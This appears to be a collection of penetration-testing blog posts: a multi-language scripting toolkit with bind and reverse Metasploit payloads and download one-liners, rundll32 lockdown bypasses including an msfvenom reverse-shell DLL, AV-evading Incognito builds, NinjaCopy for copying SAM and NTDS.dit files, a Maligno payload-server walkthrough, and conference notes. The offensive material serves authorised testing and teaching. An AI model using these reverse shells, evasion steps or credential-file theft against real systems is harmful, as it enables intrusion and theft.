Babel Scripting Framework (babel-sf)

The Babel Scripting Framework (babel-sf) is a collection of custom scripts to facilitate useful pentest related functions via scripting languages.

All of the following tools are replicated in the following languages – PowerShell, Perl, Ruby and Python:

  1. Portscanner
  2. ARPscanner
  3. FTP Client
  4. WGET Client
  5. Bind Metasploit Payload
  6. Reverse Metasploit Payload

Why a custom scripting framework?

babel-sf has been created for testing minimal installations, locked down and/or hardened environments e.g.

  1. When the target Operating System has a minimal installation
  2. When the Operating System’s native tools have been removed
  3. When the Operating System’s native tools have been locked down via ACLs, Group Policy or AppLocker

But crucially, you still have access to one or more scripting languages e.g. Python

Its development was also partially driven by my own needs:

  1. Proof of Concept i.e. to demonstrate why access to scripting languages can be bad!
  2. System Administrator “Yeah, users have access to [ruby/perl/python/PowerShell], so what?”

But really Why?

To solve reoccurring problems encountered during my testing:

  1. Having to write your own code to perform a required task (takes time!)
  2. Having to Google for code to (re)use, tweak and/or just to get working (takes time!)

I expect  babel-sf to be used when you don’t have any tools or Operating System utilities available e.g.

  1. No telnet
  2. No FTP
  3. No wget
  4. No SSH
  5. No netcat, nmap etc. etc.

In this scenario you simply download babel-sf  onto the target box via a short one liner (in whichever scripting language is available to you).


babel-sf “aspires” to be identical in each scripting language:

  1. Identical Usage (switches etc.)
  2. Identical Output
  3. Offer an identical ‘Look and Feel’


As it stands, babel-sf provides scripts for the following functions:

1. Portscanner (see examples below)

2. Arpscanner (see examples below):

So you get the idea, replicated tools in multiple scripting languages…From now on I’ll just show one example screenshot per utility (but they are all there!)

3. FTP client (crude)
ruby (example):

4. WGET client
perl (example):

5. HTTP Server
PowerShell (example):

6. Bind Metasploit Payload
python (example):

7. Reverse Metasploit Payload
ruby (example):

Initial Download?

Assuming that at least one scripting language is supported on the target system, an initial single line script (which provides wget type functionality) will be run to download babel-sf to the target host.

In practice to download babel-sf to our target system we run the relevant script, for our available programming language.  This will have to be typed in manually (but thankfully these scripts short and succinct).


Create ‘’ containing the following code and execute via: ‘perl’

use LWP::Simple; mirror('', '');


Create ‘’ containing the following code and execture via: ‘python’

import urllib; urllib.urlretrieve('', '')


Create ‘download.rb’ containing the following code and execture via: ‘ruby download.rb’

require 'open-uri';"", "wb").write(open("", "rb").read)


Create ‘download.ps1’ containing the following code and execture via: ‘powershell .\download.ps1’

(new-object System.Net.WebClient).Downloadfile("","")

Obviously, if you were located on a closed network you would download from your own host, rather than from github.

Script Uniformity?

The scripts offer uniform functionality to a point, some exceptions are:

Ruby has a socket limit (approx 1024):  This limits the maximum number of ports that can be scanned at once

I had to be flexible with the type of metasploit shells included:  Whilst, bind and reverse shells are included for each scripting language, one language may provide tcp_shells whlilst another may provide meterpreter shells

Whilst the underlying functionality is similar for all of the different HTTP servers: It proved tricky getting HTTP servers to provide a uniform look/feel:

Arpscanner usage varies a little between languages: The interface switch (e.g. eth0) is not currently supported in all languages


  1. I’m not a coder (if you are a coder, look away now!)
  2. Coding in 4 different languages at the same time is foolhardy!
  3. Bugs / Errors abound
  4. If you don’t like certain aspects, contribute! Make them better!


  1. Only limited testing has been conducted
  2. Further testing, testing, testing is required e.g. What versions of Perl, Python, Ruby and PowerShell do the scripts run on?

babel-sf has been tested on the following target Operating Systems:

Perl, Python and Ruby (Currently only targeting Nix systems)

  1. Ubuntu 12.04
  2. Debian “wheezy”

PowerShell (Windows)

  1. Created on and tested in PowerShell version 2.0 (Windows 7)

Future Additions?

Addition of further scripting languages:

  1. PHP
  2. VBScript
  3. Java
  4. More?

Github –
Blog –

Babel-sf is not wholly new code by any means; large snipets, small snipets and great ideas have been borrowed from many other open source repositories (hopefully, I’ve remembered to reference them all!):

Coding for penetration testers (Syngress Press)

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions.

However, I found that I was able to utilise rundll32.exe to attempt to enumerate/manipulate the environment.  I couldn’t really find a good pentest related resource for leveraging rundll32 so thought I’d a put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, buts it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command / function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll, KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32 Shell32.dll,OpenAs_RunDLL – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (Subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery,OpenQueryWindow – Find Users (New targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
RunDll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Steven’s has produced a nice write up on taking a third party command interpreter and converting it from .exe to .dll, for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe, the steps to do this are as follows:

1. Upload Didier Steven’s cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option to abuse rundll32 maybe to upload a Metasploit derived .dll, the steps to do this are as follows:

1. Create our reverse_shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse_shell payload .dll file to our target system e.g. HTTP

3. Start our reverse listener on our pentest host via Metasploit’s: /exploit/multi/handler

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂

By way of further reading; JavaScript can also be called through rundll32.exe, checkout the following post:


BruCON 2013 – Highlights

The fifth BruCON conference was held 26th to 27th of September 2013 in Ghent, Belgium.  From the off, the conference had a great feel, its organised by a group of security enthusiasts as a non-profit organisation and they do a great job.  From the live classical piano playing in the lounge/rest area where you have you  meals; breakfast, lunch and dinner (which are all included in the low price) to the large screen displaying all the recent #BruCON twitter activity it makes for an enjoyable couple of days.  The conference was organised into a single (main auditorium) speaker track and 2 hands-on lab tracks in the afternoon.  Whilst you’re wholly free to mix and match between the main track and the lab tracks, I focused on the main speaker track (although I did hear that the labs were also excellent!), my vague recollections and highlights can be found below.

HTTP Time bandit – Vaagn Toukharian

The tool is basically a tool to perform resource usage denial of service (DOS) type attacks against layer 7 or as referred to during the talk “HTTP GET flooding with spice”. In essence the tool performs a GET flood but some analysis is done before flooding takes place.

The tool first conducts a spider of the site to determine and collect the transfer times for each resource, the average speed of transfers are calculated. Once complete the resource(s) That have the slowest average transfer time(s) are calculated; effectively CPU intensive resources take longer to respond and this is what we are identifying here. To remove false positives from the returned data set statistics are used to analyse the data and discard resources that have a large degree of variance i.e. non consistent time delays that have another cause e.g. network latency.

The tool is available on the GitHub link:

The speakers moved on to discuss traditional DDOS defences in the form of load balancing and commercial protection services e.g. cloud based solutions, identifying and fixing resource hogs, apache configuration options and other apache modules advanced mod_security protection

The speakers suggested that Timebandit can be used itself to identify and fix these resource hogs. And went on to state that in an ideal world the tool itself would generate configuration files to protect the system (stating this was unlikely to happen).

The following Apache modification options were discussed:

  1. mod_security – offers simple protections that reduced an unprotected attack (i.e. without the change) with a CPU threshold of 98% down to a CPU load of 0% (with the change applied)
  2. mod_limitpconn – limits the number of downloads
  3. mod_qos – provides resource management options
  4. mod_bwshare – accepts or rejects connections based on previous transactions with a source IP address
  5. mod_evasive – DOS/DDOS protection measures
  6. mod_httpbl – Makes use of project honeypot to gather a list of violators for the blacklist (it was suggested this was good in theory but hadn’t been examined in detail)

Taking the BDSM out of PCI with Open Source – Erin Jacobs and Zack Fasel

As most people who deal with it are only too painfully aware PCI DSS represents the Payment Card Industries, Data Security Standard.

  • PCI compliance comprises of levels 1-4.
  • Companies attempt to outsource the problem
  • Open Source Solutions can be used for everything except external vulnerability scans.
  • No clear PCI configuration guidelines, very generalised

The speakers have started the “Open PCI”. With the aim to provide open source guidelines which are scalable, contain specific walk throughs and simple deployments via ready-to-go installations / virtual machines.

Although there are 12 PCI issues, the talk was only concerned about those that people are getting wrong, these issues in priority were:

  • Logging: either not doing it well or spending too much money on it. Splunk whilst an excellent resource is too expensive. How about an open source option?

Linux = traditional options have been: syslog or deploying an agent.
Windows = Deploying an agent (most likely option) or integration with HIDS.

  • Log server storage options were discussed “fluentd” was posed as a possible open source option to Splunk.
  • File Integrity Monitoring: several options were discussed with the best suggested being OSSEC.
  • Patch Management: it was stated that this probably the hardest thing to address with open source, but chef / puppet were suggested by a member of the audience as possible options.
  • 2 factor authentication: OAUTH a hardware and software solution.
  • AV – anomaly or ClamAV based or potentially binary white-listing.

CobraDroid – Jake Valletta

CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!).

AppUse was discussed a closed source dynamic analysis tool.

CobraDroid setup:
Setup Android SDK, Download archives from his site, create new AVD (may have missed a stage here, see slides for full details).

CobraDroid runs Android 2.3, provides both Bash and Busybox which offers a much more user friendly testing environment.

CobraDroid Functionality:

The tools SSL validation bypass allows you to man in the middle SSL connections!

Application specific packet capture, uses custom iptables rules, resultant pcap files can be viewed wire shark.

Uses method hooking to alert on method calls – configured via the file /etc/hooks.conf

Project website:

Real Time Analysis and Visualisation of Internet Status – Tiago Balgan Henriques, Tiago Martins, Joao Gouveia

Events are processed and analysed, as they happen, without storing large data volumes, enabling live actionable intelligence and rapid response capabilities for threat analysts and decision makers who want to stay ahead of emerging threats and opportunities or in other words “events, lots and lots of events”.

The huge amount and variety of data to tackle is difficult, a common API?

The speaker team have created a high performance scalable Complex Event Processor (CEP), uses streaming technology, follows publisher/subscriber model. Events are all handled in JSON format.

“StreamForce” = CEP
Search forms are entered and used to query the API
Real time feed services from multiple sources i.e. Honeypots, DNS, mail protection products.

Once the form is submitted It is possible to display a geographic maps showing botnet activity, Zeus activity etc. For example it would be possible to show the biggest botnets in any specific country.

Lightening Talks – Day 1

OWASP JAWS – Purpose: The purpose of the project is to have a workset with runnable java code that shows secure coding practices in a working way. Too many times developers end up at some developer forum where someone asks a question and the solutions (that may be working but not necessarily in a secure way) are copied and end up in production code:

DNS Amplification Attacks – Lucas Kauffman some very good slides that should be read in their entirety:

The curious case of – Speaker was trying to determine why one host was always resolving to a non Google related IP address in China i.e. It turned out that DNS responses were being resolved to IPV6 addresses but interpreted as IPV4 addresses by affected hosts i.e. decoded and always resolving to i.e this address hosted in China.

HTTP2.0 (Speedy) – Google’s implementation accepted as the new standard – makes use of header compression both client and server side. Not pull and request as old implementations but multiple simultaneous conversations – Burp doesn’t work with it! It’s all SSL, Web over UDP as well as TCP.

Day 2

Paint by numbers vs Monet – Russ Gideon

Analysis of APT attacks has shown that an MSF module has been seen in APT attacks 7 of 22 in the CVE PDF exploit discussed, the only change from the default MSF module was that the shellcode changed and obfuscation was added but it was the same basic code in use on the whole.

Once access has been gained: long term back doors established, credential harvesting, lateral movement, mimikatz (can be their own version), PTH toolkit, their own psexec.exe. Dropper installs a service. Remote named pipes for all communications.

The speakers have created a custom psexec module (on GitHub), to hide from forensics, AV etc.

Discussed a black hat group: installed 3 x back doors on each host, used UPX for packing (i.e. old/lame) and self extracting RAR file, they attacked sticky keys (sethc) and magnify for privilege escalation. SYSTEM$ user added and the user was also added to the local admins group, password identified was “qazwsx!#123”

In conclusion they summarised that APT attacks were not highly sophisticated, the groups behind the attacks do not think like pentesters, they think forensically and opportunistically.
Conclusion: pentesters usually have a much different footprint and end goals than those of APT operators / Nation States.

Data Plane Networking – Robert Graham

Apache/Bind should not be exposed to the Internet they were designed for the Internet that existed in the late 90’s and are not robust/ruggedised enough for today’s Internet (I paraphrase here). The speaker suggested using an exokernel i.e every event has its own thread and a virtual network adapter. A more short term solution is to make use of Nginx (as opposed to Apache) and other DNS servers (as opposed to Bind) faster.

Building Custom Android Malware for Pen Testing – Stephan Chenette

Android uses the Dalvik Virtual Machine. Malware defined as anything that breaks the security model without the users knowledge.

Once installed malware will probe for emulator or physical device (won’t trigger if emulator is detected as an end user would not be running an emulator), what type of network connection: wifi,3G etc.

Malware actions i.e. what are they trying to achieve: to make use of premium services that the user is charged for (not until their next bill) or advertising i.e. the client is used as an SMS bot sending texts to a wider user community.

One infection discussed was simply installing a valid application (no Trojan), but the app contains a vulnerability that is exploited only when the victim connects to attackers website.

The majority of malware today is found on 3rd party stores, although some is also found on the Google store.

Summary: Apps can do almost anything; the speaker suggests the fix is not restricting this functionality but in comprehensively reviewing applications’ behaviour and ensuring they conform to their specified security model.

Geolocation of GSM devices – David Perez and Jose Pico

This talk focused on the Geolocaton of GSM (I.e. 2G devices) when there is no access to the phone network. The only thing known about the handset was the IMEI (i.e. the unique device) and IMSI (i.e the unique SIM) and rough location of the device. The scope was to produce a car based/portable solution.

The equipment utilised by the team was a portable fake GSM Base station (USRP1), Omni-directional and directional antennas (to pinpoint the exact location), Software the team used was in the form of Open Base Transceiver Station (OpenBST). All of the equipment needed to provide GPS data, triangulation and a user console.

Initially the team focused on distance estimation based on power measurements, this method failed and was soon discarded.

Time based triangulation could only locate devices plus or minus 500 meters, this was initially deemed to be a fail as it was not accurate enough (the inaccuracy was due to a delay introduced that was dependant on phone make/model/vendor).

This testing is illegal in most countries, however the team stated all testing was conducted in a country where it was legal….

The team did find a solution to the device introduced delays, but whilst results were much better after this problem had been solved, results were still not good enough.

The next issue was that when the team were impersonating the real network, no devices would register with the fake cell (phones didn’t see it), if tests were repeated with commercial BTS they did register why?

Power related issue? No
Beacons wrong? No, they were different between the fake and real cells initially but even after this had been fixed the issue still existed.

No precision of the clock (needs to be very precise) turned out frequency was too high by 900hz (the standard only allows for 45hz deviation) Fixed? Not entirely, devices did finally register to the fake cell but it still wasn’t working properly > the team bought a better clock > this finally solved the issue!

Once registered to the fake cell phones stayed registered for 1.8Km; within the range of the phone. Max distance device registered 15 meters, not enough power….could not beat the power of the real base station. You win this race by manipulating Cell Re-selection Offset (CRO); which is used for roaming between cells.

The final solution involved getting close to target and switching to directional antenna.

Here it was thought that the more power you receive from the target, you are pointing at target? This assumption was wrong, power fluctuated even when antenna was stable; the cause was BTS telling the target device to lower or raise it’s power….this was happening!

Fix = Disabled this mechanism in the OpenBST source code but only once the kit was close enough to move into directional mode…then the team finally had a WIN : )

With this final solution the team were able to pinpoint devices down to 20 metres (in an open field environment), these figures were not quite as good in an urban environment.

With this problem finally solved (after several months of work), the team stated their future work would be to attempt a solution for achieving the same for 3G networks. Whilst the team are limited by the fact that no open source 3G base station implementation exists they are optimistic that it is possible with 3G.

Old Incognito binary not working? or being eaten by AV? Then make your own

The original incarnation of Incognito has been around for a while it’s now a little dated and also picked up by the vast majority of Anti-Virus vendors.

With this in mind I was intrigued by post by Josh Stone who has done a nice write up on creating an Incognito binary via the Metasploit Framework source code (and one small addition):

Quick Start:

Download the following files from the meterpreter GitHub repository or from a local metasploit framework install:

list_tokens.h, list_tokens.c, token_info.c, token_info.h, incognito.h

and download main.c from Josh’s site.

Then compile yourself up a new version making some subtle changes to original source code and it’s unlikely your shiny new tool with ever get picked up by AV:

gcc -o Incognito.exe main.c list_tokens.c token_info.c 

It’s also worth mentioning that MWR Labs have updated Incognito to version 2.0 (with source code available) so this is also worth a look.



NinjaCopy – Read Any File On Any System

Want to read any file on any box?*

*Powershell and Admin account required

Take a look at:

This script is ideal for dropping local SAM files off compromised hosts or dropping the NTDS.dit file off domain controllers.

Basic usage:

PS > .\Invoke-NinjaCopy.ps1 -Path “C:\Windows\System32\config\sam” -LocalDestination “c:\copy_of_local_sam”

Download here:

Maligno (Metasploit Payload Server) – Hands On

I stumbled across Maligno on SecurityTube there’s a good video:

Maligno is an open source penetration testing tool that from Encripto ( that serves Metasploit payloads.

The only negative I can see with it are that Python needs to be installed on the victim along with Pycrypto (which may be present on *nix targets but is not part of Python 2.7 for Windows).

Maligno is available for download here:

What is it? [From the Maligno README]

It generates shellcode with msfvenom and transmits it over HTTP or HTTPS.

The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities.

The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

As a result, you should get your Metasploit session while avoiding detection.

Hands On

My Lab setup:



First Use:

You must create an SSL certificate in order to set up Maligno with HTTPS. will do the job for you.



Make the appropriate changes to server.conf:


msfpath = /opt/metasploit/app/

msfpayload = windows/meterpreter/reverse_https, windows/meterpreter/reverse_tcp, windows/meterpreter/reverse_http

msflhost =

msflport = 4444

msfencoder = x86/shikata_ga_nai

msfiterations = 10

msfcache = true

msfcachefile = msfcache


base64rounds = 1

blocksize = 32

paddingchar = !

secret = cedbd5af520bdab20c3b79d521d8b1c8


scope =


srvport = 443

ssl = true

sslcert = ./certs/server.pem

banner = Microsoft-IIS/7.5

reqparam = id

Upload and make appropriate changes to i.e.:

# IP address and port where Maligno server is waiting for connections

server_addr = “”

server_port = “443”

Starting Maligno Server:

# ./


| Maligno v0.6: A Metasploit payload server |

| by Juan J. Guelfo, Encripto AS ( |


[*] Starting Maligno…

[*] Reading server configuration…

[*] SSL certificate file found. SSL enabled…

[*] Maligno is up and running. Press CTRL+C to stop…

Maligno Client Dependencies:

Python (Tested with 2.7 on Windows XP)


pycrypto (

Tested with

Running Maligno Server:

CTRL-C Maligno server as soon as…

[+] Package sent!

[*] End of request

…is received.

Victim (Maligno Client):

Meterpreter session doesn’t seem to start until you CTRL-C the Maligno Server (which has done it’s job anyway!)


: )

44Con 2012 – Highlights

The 2nd Annual 44Con was held 5th to 7th September 2012 in Kensington / London.  For a technical conference it is as good as we get in the UK, I felt a little let down by the fact that there didn’t seem to be two full tracks running simultaneous over the full two day period and that the talks schedule was not available until the morning of the Con.  But on the whole they deserve to be commended for what they have brought to the UK technical conference scene.  My highlights this year:

BeEF – I’m the Butcher, would you like some BeEF? – Michele Oru & Thomas Mackenzie

This talk centred around the (Browser Exploitation Framework) BeEF talked about some new social engineering modules the team have added to the framework.  Namely they have added support for WebSockets, the RESTful API, a mass e-mailer function (intended to end phishing e-mail to unsuspecting users) and a fake Flash update function, which prompts the user to install a fake Flash player update (Google Chrome only).

Once the victim has installed the fake Flash player update the attacker is rewarded with improved victim hook persistence and is able to enumerate all cookies from a user including HttpOnly cookies.

The mass e-mailer was written to improve on the options available in the Social-Engineer Toolkit (SET), and was demo’d in the following context:

  1. Attacker clones a genuine website e.g.
  2. A genuine looking phishing e-mail is delivered to victim e.g. an edfenergy customer.
  3. Victim follows link to cloned website (, victims browser is hooked into beef.
  4. Victim logs into cloned website, credentials are captured in BeEF console.
  5. Note: The original site ( is loaded in an overlay iFrame (if it can be framed), if not the victim’s traffic is redirected to the original site.

These discussion of these new social engineering tools/techniques was followed up by a discussion of the closer integration of BeEF and Metasploit.  More details here:

Malware Analysis As A Hobby – Michael Boman & Siavosh Zarrasvand

This talk introduced the Malware Analyst Research Toolkit (MART) which aims to bring a documented process to malware analysis utilising several components; the main player of which was a virtualised ‘Cuckoo’ sandbox.

Obviously to conduct any detailed research a plethora of malware sample are required, the following methods were utilised to acquire the malware:

  1. Spidering malicious/phishing e-mail URLs.
  2. Using malicious received e-mail attachments.
  3. Sharing with other malware analysts.

Once suitable malware is obtained it is sent to the Cuckoo sandbox for analysis, this analysis stage recorded the following:

  1. List of any dropped files
  2. Details of any outbound DNS/HTTP requests
  3. Created a pcap file of the malware network interactions
  4. Took screenshots of the interaction of the malware with a user’s desktop
  5. Details of all hosts (i.e. IPs) involved in any malware communications
  6. Details of all registry keys added, amended, deleted etc..
  7. Details of the malwares process flow

The speakers then conducted a workshop to help anyone who wanted to build their own MART.  For more details see:

IPS False Positive Abuse – Arron Finnon

After some discussion on the well known limitations of Intrusion Prevention System (IPS) the speaker discussed some fun ways of abusing IPS signatures e.g. changing Firefox’s user agent string to match IPS signatures; Snort ID 1390 and 1394 were given as typical examples of ‘Alert’ and ‘Drop’ rules.

Stonesoft’s expensive ‘Evader’ product was mentioned, the product is designed to (see if it can) bypass security device filters and signatures.  A novel ‘free’ approach was suggested; utilising pcap files of malicious traffic along with the Fragrouter functionality now contained in TCPRelay for testing your own environment.

The discussion moved on to the interesting idea of trying to develop an Open Source testing methodology for IDS/IPS devices and/or implementations i.e. something akin to OWASP for web applications.  This sounds like a great idea and hopefully we’ll see some output from this effort soon; the initial thinking was a top 5 issues (similar to OWASP top 10) that once adopted could be easily added to.

Domain Generation Algorithm (DGA) Detection & Optimisation – Gunter Ollmann

This talk centred on the detection of the Domains (e.g. being used by malware housed on infected hosts within your environment to get back to their command and control network(s).

Apparently the new generation of malware has a significant backup strategy i.e. the callback Domain(s) can be generated dynamically at some future date (e.g. by incorporating some information from the most popular article on the BBC news website for a given day).  The speaker even stated that sometimes the defenders can register these callback Domains (via reversing the algorithm) and beat the attackers to registering the Domains.

The infected hosts may try and contact any of several hundred callback domains trying to find a valid command and control server.  The identification of these domains and subsequently the hosts that would be infected within your environment focused on analysing the failed DNS look-ups.  For example if several hosts are making numerous  failed DNS look-ups, to ‘strange’ Domains analysis of these records could potentially identify infected hosts within your environment.  Example of failed DNS lookups:

Terrorism, tracking, privacy and human interactions – Dan Cuthbert & Glenn Wilkinson

Whilst this talk was generally speaking very interesting the key point to take away is that a new tool is shortly to be released ‘Snoopy’.  ‘Snoopy’ is a distributed wireless tracking and reporting framework comprising of a client and server architecture.  The client component can be installed on any Linux device capable of packet sniffing/packet injection.

The functionality of the tool ranges from:

  1. Rogue Access Point functionality (i.e. similar to karma/karmetasploit)
  2. General Man-in-the-Middle (MitM) capabilities
  3. SSL MitM via SSLStrip
  4. Java Script to profile devices
  5. Data extraction e.g. search for all .doc instances

All of the above attacks are reported back to the ‘Snoopy’ server which utilises a MySQL database for data storage.  Finally some sample data gathered via the tools was demo’d in Paterva’s new Maltego Radium tool (basically think Maltego with loads of additions and improvements).

Post-Exploitation Tu-Dot-Oh! – Rich Smith

This talk focused on long term Penetration Tests i.e. test engagement of 6-12 months (we almost need a new term for this type of engagement!).  The goals for the testing were 2-fold:

  1. Read target CEO’s e-mail
  2. Access and alter target companies source code

The fact that exploitation was the start of the attack and not the end was a major theme here.  Another theme was that the way things are currently being done e.g. using binary droppers (think msfpayload), may not be the answer.  The problem with binary droppers is that all of the payloads capabilities are built into them, providing a wealth of information for any savvy reverse engineers of forensics teams.  And the solution?

  1. A single payload that can be run everywhere (any Operating System)
  2. A payload that provides scrambling and stealth; the full capbilities of the attacker are not built into the payload but kept server side.

The speakers solution was to use Python over the wire bytecode; i.e. it was portable with functionality provided via ‘reach back’ rather than ‘bake in’.  The python bytecode demonstrated made use of import hooks and using HTTPS GET request to pull further bytecode which runs in memory without touching the disk.  Some of the other feature of the tool demo’d:

  1. Resolves bytecode trees remotely and transparently i.e. no source code mods
  2. Scrubs memory after use
  3. Zip imports are used for larger bytecode imports from the server
  4. Unique victim IDs are taken from System Management BIOS (32-bit UUID) which are truly unique (unlike MAC addresses)
  5. A polling mechansim at random intervals is utilised to GET tasks from the server which are queued up on a UUID basis